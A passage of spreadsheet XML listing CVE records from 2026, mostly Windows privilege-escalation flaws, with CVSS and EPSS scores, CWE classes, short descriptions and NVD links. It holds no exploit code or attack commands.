      <c r="K2340" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L2340" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M2340" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-83977</t>
        </is>
      </c>
    </row>
    <row r="2341">
      <c r="A2341" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2341" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-83978</t>
        </is>
      </c>
      <c r="C2341" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D2341" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2341" s="5" t="inlineStr"/>
      <c r="F2341" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G2341" s="5" t="inlineStr">
        <is>
          <t>microsoft, windows</t>
        </is>
      </c>
      <c r="H234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41" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2341" s="5" t="inlineStr"/>
      <c r="K2341" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L2341" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M2341" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-83978</t>
        </is>
      </c>
    </row>
    <row r="2342">
      <c r="A2342" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2342" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-83979</t>
        </is>
      </c>
      <c r="C2342" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D2342" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2342" s="5" t="inlineStr"/>
      <c r="F2342" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G2342" s="5" t="inlineStr">
        <is>
          <t>microsoft, windows</t>
        </is>
      </c>
      <c r="H234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42" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2342" s="5" t="inlineStr"/>
      <c r="K2342" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="L2342" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M2342" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-83979</t>
        </is>
      </c>
    </row>
    <row r="2343">
      <c r="A2343" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2343" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-83980</t>
        </is>
      </c>
      <c r="C2343" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D2343" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2343" s="5" t="inlineStr"/>
      <c r="F2343" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G2343" s="5" t="inlineStr">
        <is>
          <t>microsoft, windows</t>
        </is>
      </c>
      <c r="H234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43" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2343" s="5" t="inlineStr"/>
      <c r="K2343" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L2343" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M2343" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-83980</t>
        </is>
      </c>
    </row>
    <row r="2344">
      <c r="A2344" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2344" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-83981</t>
        </is>
      </c>
      <c r="C2344" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D2344" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2344" s="5" t="inlineStr"/>
      <c r="F2344" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G2344" s="5" t="inlineStr">
        <is>
          <t>microsoft, windows</t>
        </is>
      </c>
      <c r="H234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44" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2344" s="5" t="inlineStr"/>
      <c r="K2344" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L2344" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M2344" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-83981</t>
        </is>
      </c>
    </row>
    <row r="2345">
      <c r="A2345" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2345" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-83982</t>
        </is>
      </c>
      <c r="C2345" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D2345" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2345" s="5" t="inlineStr"/>
      <c r="F2345" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G2345" s="5" t="inlineStr">
        <is>
          <t>microsoft, windows</t>
        </is>
      </c>
      <c r="H234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45" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2345" s="5" t="inlineStr"/>
      <c r="K2345" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L2345" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M2345" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-83982</t>
        </is>
      </c>
    </row>
    <row r="2346">
      <c r="A2346" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2346" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-83983</t>
        </is>
      </c>
      <c r="C2346" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D2346" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2346" s="5" t="inlineStr"/>
      <c r="F2346" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G2346" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H2346" s="5" t="inlineStr"/>
      <c r="I2346" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2346" s="5" t="inlineStr"/>
      <c r="K2346" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L2346" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M2346" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-83983</t>
        </is>
      </c>
    </row>
    <row r="2347">
      <c r="A2347" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2347" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-83985</t>
        </is>
      </c>
      <c r="C2347" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D2347" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2347" s="5" t="inlineStr"/>
      <c r="F2347" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G2347" s="5" t="inlineStr">
        <is>
          <t>microsoft, windows</t>
        </is>
      </c>
      <c r="H234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47" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2347" s="5" t="inlineStr"/>
      <c r="K2347" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L2347" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M2347" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-83985</t>
        </is>
      </c>
    </row>
    <row r="2348">
      <c r="A2348" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2348" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-83986</t>
        </is>
      </c>
      <c r="C2348" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D2348" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2348" s="5" t="inlineStr"/>
      <c r="F2348" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G2348" s="5" t="inlineStr">
        <is>
          <t>microsoft, windows</t>
        </is>
      </c>
      <c r="H234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48" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2348" s="5" t="inlineStr"/>
      <c r="K2348" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L2348" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M2348" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-83986</t>
        </is>
      </c>
    </row>
    <row r="2349">
      <c r="A2349" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2349" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-83987</t>
        </is>
      </c>
      <c r="C2349" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D2349" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2349" s="5" t="inlineStr"/>
      <c r="F2349" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G2349" s="5" t="inlineStr">
        <is>
          <t>microsoft, windows</t>
        </is>
      </c>
      <c r="H234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349" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2349" s="5" t="inlineStr"/>
      <c r="K2349" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L2349" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M2349" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-83987</t>
        </is>
      </c>
    </row>
    <row r="2350">
      <c r="A2350" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2350" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-83988</t>
        </is>
      </c>
      <c r="C2350" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D2350" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2350" s="5" t="inlineStr"/>
      <c r="F2350" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G2350" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H2350" s="5" t="inlineStr"/>
      <c r="I2350" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2350" s="5" t="inlineStr"/>
      <c r="K2350" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L2350" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M2350" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-83988</t>
        </is>
      </c>
    </row>
    <row r="2351">
      <c r="A2351" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2351" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-83990</t>
        </is>
      </c>
      <c r="C2351" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D2351" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2351" s="5" t="inlineStr"/>
      <c r="F2351" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G2351" s="5" t="inlineStr">
        <is>
          <t>microsoft, windows</t>
        </is>
      </c>
      <c r="H2351" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_11_23h2, microsoft:windows_11_24h2, microsoft:windows_11_25h2, microsoft:windows_11_26h1, microsoft:windows_server_2022, microsoft:windows_server_2025</t>
        </is>
      </c>
      <c r="I2351" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2351" s="5" t="inlineStr"/>
      <c r="K2351" s="5" t="inlineStr">
        <is>
          <t>CWE-121</t>
        </is>
      </c>
      <c r="L2351" s="5" t="inlineStr">
        <is>
          <t>Stack-based buffer overflow in Microsoft Graphics Component allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M2351" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-83990</t>
        </is>
      </c>
    </row>
    <row r="2352">
      <c r="A2352" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2352" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-83995</t>
        </is>
      </c>
      <c r="C2352" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D2352" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2352" s="5" t="inlineStr"/>
      <c r="F2352" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G2352" s="5" t="inlineStr">
        <is>
          <t>microsoft, windows</t>
        </is>
      </c>
      <c r="H23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352" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2352" s="5" t="inlineStr"/>
      <c r="K2352" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L2352" s="5" t="inlineStr">
        <is>
          <t>Heap-based</t>
        </is>
      </c>
      <c r="M2352" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-83995</t>
        </is>
      </c>
    </row>
    <row r="2353">
      <c r="A2353" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2353" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-84000</t>
        </is>
      </c>
      <c r="C2353" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D2353" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2353" s="5" t="inlineStr"/>
      <c r="F2353" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G2353" s="5" t="inlineStr">
        <is>
          <t>microsoft</t>
        </is>
      </c>
      <c r="H2353" s="5" t="inlineStr"/>
      <c r="I2353" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2353" s="5" t="inlineStr"/>
      <c r="K2353" s="5" t="inlineStr">
        <is>
          <t>CWE-122, CWE-190</t>
        </is>
      </c>
      <c r="L2353" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Microsoft Graphics Component allows an authorized attacker to execute code locally.</t>
        </is>
      </c>
      <c r="M2353" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-84000</t>
        </is>
      </c>
    </row>
    <row r="2354">
      <c r="A2354" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2354" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-84042</t>
        </is>
      </c>
      <c r="C2354" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D2354" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2354" s="5" t="inlineStr"/>
      <c r="F2354" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G2354" s="5" t="inlineStr"/>
      <c r="H2354" s="5" t="inlineStr"/>
      <c r="I2354" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="J2354" s="5" t="inlineStr"/>
      <c r="K2354" s="5" t="inlineStr">
        <is>
          <t>CWE-269</t>
        </is>
      </c>
      <c r="L2354" s="5" t="inlineStr">
        <is>
          <t>A flaw was found in crun. When crun is built with libkrun and a container is started rootful with passt networking (krun.use_passt), crun can execute attacker-controlled payload from the container image with host root privileges. The issue is a regression in crun 1.29. It affects crun &gt;= 1.29</t>
        </is>
      </c>
      <c r="M2354" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-84042</t>
        </is>
      </c>
    </row>
    <row r="2355">
      <c r="A2355" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2355" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85983</t>
        </is>
      </c>
      <c r="C2355" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D2355" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2355" s="5" t="inlineStr"/>
      <c r="F2355" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G2355" s="5" t="inlineStr"/>
      <c r="H2355" s="5" t="inlineStr"/>
      <c r="I2355" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2355" s="5" t="inlineStr"/>
      <c r="K2355" s="5" t="inlineStr">
        <is>
          <t>CWE-94</t>
        </is>
      </c>
      <c r="L2355" s="5" t="inlineStr">
        <is>
          <t>The Auth0 AD/LDAP Connector improperly processes a configuration value during service startup. This allows a low-privileged user on the host system to modify the connector's configuration. When the service restarts, the modified configuration can lead to code execution with the privileges of the service account.</t>
        </is>
      </c>
      <c r="M2355" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85983</t>
        </is>
      </c>
    </row>
    <row r="2356">
      <c r="A2356" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2356" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86313</t>
        </is>
      </c>
      <c r="C2356" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D2356" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2356" s="5" t="inlineStr"/>
      <c r="F2356" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G2356" s="5" t="inlineStr"/>
      <c r="H2356" s="5" t="inlineStr"/>
      <c r="I2356" s="5" t="inlineStr">
        <is>
          <t>2026-09-07</t>
        </is>
      </c>
      <c r="J2356" s="5" t="inlineStr"/>
      <c r="K2356" s="5" t="inlineStr">
        <is>
          <t>CWE-787</t>
        </is>
      </c>
      <c r="L2356" s="5" t="inlineStr">
        <is>
          <t>Out-of-bounds write vulnerability in Samsung Opensource Walrus allows Overflow Buffers.
This issue affects Walrus: af80e665ea49d9003695a66502f841ed1d8397e7.</t>
        </is>
      </c>
      <c r="M2356" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86313</t>
        </is>
      </c>
    </row>
    <row r="2357">
      <c r="A2357" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2357" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86504</t>
        </is>
      </c>
      <c r="C2357" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D2357" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2357" s="5" t="inlineStr"/>
      <c r="F2357" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G2357" s="5" t="inlineStr"/>
      <c r="H2357" s="5" t="inlineStr"/>
      <c r="I2357" s="5" t="inlineStr">
        <is>
          <t>2026-09-07</t>
        </is>
      </c>
      <c r="J2357" s="5" t="inlineStr"/>
      <c r="K2357" s="5" t="inlineStr">
        <is>
          <t>CWE-829</t>
        </is>
      </c>
      <c r="L2357" s="5" t="inlineStr">
        <is>
          <t>In JetBrains IntelliJ IDEA before 2026.2.2 missing project-trust confirmation before building a Dev Container allowed host-level code execution</t>
        </is>
      </c>
      <c r="M2357" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86504</t>
        </is>
      </c>
    </row>
    <row r="2358">
      <c r="A2358" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2358" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-88052</t>
        </is>
      </c>
      <c r="C2358" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D2358" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2358" s="5" t="inlineStr"/>
      <c r="F2358" s="5" t="inlineStr"/>
      <c r="G2358" s="5" t="inlineStr"/>
      <c r="H2358" s="5" t="inlineStr"/>
      <c r="I2358" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="J2358" s="5" t="inlineStr"/>
      <c r="K2358" s="5" t="inlineStr">
        <is>
          <t>CWE-129, CWE-787</t>
        </is>
      </c>
      <c r="L2358" s="5" t="inlineStr">
        <is>
          <t>Tesseract is an open source OCR engine. In version 5.5.3 and earlier, UNICHARSET::load_via_fgets in src/ccutil/unicharset.cpp trusts the declared unichar count as a loop bound and uses id as an unchecked index into the unichars vector. unichar_insert_backwards_compatible can leave the vector unchanged for an empty, duplicate, or already-encodable representation, causing id to become larger than unichars.size(). Subsequent set_* calls and the write to unichars[id].properties.enabled then write UNICHAR_PROPERTIES beyond the vector during initialization in both the default LSTM and legacy engines, causing heap corruption, a crash, or potentially controlled corruption. No fixed release is available as of this review.</t>
        </is>
      </c>
      <c r="M2358" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-88052</t>
        </is>
      </c>
    </row>
    <row r="2359">
      <c r="A2359" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2359" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-9034</t>
        </is>
      </c>
      <c r="C2359" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D2359" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2359" s="5" t="inlineStr"/>
      <c r="F2359" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G2359" s="5" t="inlineStr"/>
      <c r="H2359" s="5" t="inlineStr"/>
      <c r="I2359" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2359" s="5" t="inlineStr"/>
      <c r="K2359" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="L2359" s="5" t="inlineStr">
        <is>
          <t>Use After Free vulnerability in Arm Ltd Bifrost GPU Userspace Driver, Arm Ltd Valhall GPU Userspace Driver, Arm Ltd Arm 5th Gen GPU Architecture Userspace Driver allows a non-privileged user process to perform valid GPU processing operations, including via WebGL or WebGPU, to access already freed memory.
This issue affects Bifrost GPU Userspace Driver: from r42p0 through r49p5, from r50p0 through r51p0, from r54p1 through r54p3; Valhall GPU Userspace Driver: from r42p0 through r49p5, from r50p0 through r54p3, r55p0; Arm 5th Gen GPU Architecture Userspace Driver: from r42p0 through r49p5, from r50p0 through r54p3, r55p0.</t>
        </is>
      </c>
      <c r="M2359" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-9034</t>
        </is>
      </c>
    </row>
    <row r="2360">
      <c r="A2360" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2360" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-15140</t>
        </is>
      </c>
      <c r="C2360" s="5" t="n">
        <v>7.7</v>
      </c>
      <c r="D2360" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2360" s="5" t="inlineStr"/>
      <c r="F2360" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G2360" s="5" t="inlineStr">
        <is>
          <t>red hat, kubernetes</t>
        </is>
      </c>
      <c r="H2360" s="5" t="inlineStr"/>
      <c r="I2360" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J2360" s="5" t="inlineStr"/>
      <c r="K2360" s="5" t="inlineStr">
        <is>
          <t>CWE-266</t>
        </is>
      </c>
      <c r="L2360" s="5" t="inlineStr">
        <is>
          <t>A privilege-escalation issue in the Portworx Operator when deployed on Red Hat OpenShift (OCP). Only under specific conditions during the initial provisioning of a Portworx storage cluster, a user holding only limited, namespace-scoped permissions could cause the operator to grant broader access than intended, potentially resulting in elevated privileges within the Kubernetes cluster.</t>
        </is>
      </c>
      <c r="M2360" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-15140</t>
        </is>
      </c>
    </row>
    <row r="2361">
      <c r="A2361" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2361" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-15913</t>
        </is>
      </c>
      <c r="C2361" s="5" t="n">
        <v>7.7</v>
      </c>
      <c r="D2361" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2361" s="5" t="inlineStr"/>
      <c r="F2361" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G2361" s="5" t="inlineStr"/>
      <c r="H2361" s="5" t="inlineStr"/>
      <c r="I2361" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J2361" s="5" t="inlineStr"/>
      <c r="K2361" s="5" t="inlineStr">
        <is>
          <t>CWE-23</t>
        </is>
      </c>
      <c r="L2361" s="5" t="inlineStr">
        <is>
          <t>In versions prior to 7.10.2 a path traversal vulnerability in the /attachRemoteFiles endpoint of Fortra's GoAnywhere MFT allows Web Users with both Secure Folders and Secure Mail permissions to escape their sandboxed home directory, achieving arbitrary file read.</t>
        </is>
      </c>
      <c r="M2361" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-15913</t>
        </is>
      </c>
    </row>
    <row r="2362">
      <c r="A2362" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2362" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-17176</t>
        </is>
      </c>
      <c r="C2362" s="5" t="n">
        <v>7.7</v>
      </c>
      <c r="D2362" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2362" s="5" t="inlineStr"/>
      <c r="F2362" s="5" t="inlineStr"/>
      <c r="G2362" s="5" t="inlineStr"/>
      <c r="H2362" s="5" t="inlineStr"/>
      <c r="I2362" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="J2362" s="5" t="inlineStr"/>
      <c r="K2362" s="5" t="inlineStr">
        <is>
          <t>CWE-78</t>
        </is>
      </c>
      <c r="L2362" s="5" t="inlineStr">
        <is>
          <t>An OS
command injection vulnerability in the TDDP module of Deco BE11000 allows an
adjacent network attacker to execute arbitrary commands with root privileges by
sending a crafted UDP packet.
Successful exploitation may lead to complete
device compromise, including unauthorized command execution, modification of
device settings, and loss of confidentiality, integrity, and availability</t>
        </is>
      </c>
      <c r="M2362" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-17176</t>
        </is>
      </c>
    </row>
    <row r="2363">
      <c r="A2363" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2363" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-17527</t>
        </is>
      </c>
      <c r="C2363" s="5" t="n">
        <v>7.7</v>
      </c>
      <c r="D2363" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2363" s="5" t="inlineStr"/>
      <c r="F2363" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G2363" s="5" t="inlineStr"/>
      <c r="H2363" s="5" t="inlineStr"/>
      <c r="I2363" s="5" t="inlineStr">
        <is>
          <t>2026-07-27</t>
        </is>
      </c>
      <c r="J2363" s="5" t="inlineStr"/>
      <c r="K2363" s="5" t="inlineStr">
        <is>
          <t>CWE-639</t>
        </is>
      </c>
      <c r="L2363" s="5" t="inlineStr">
        <is>
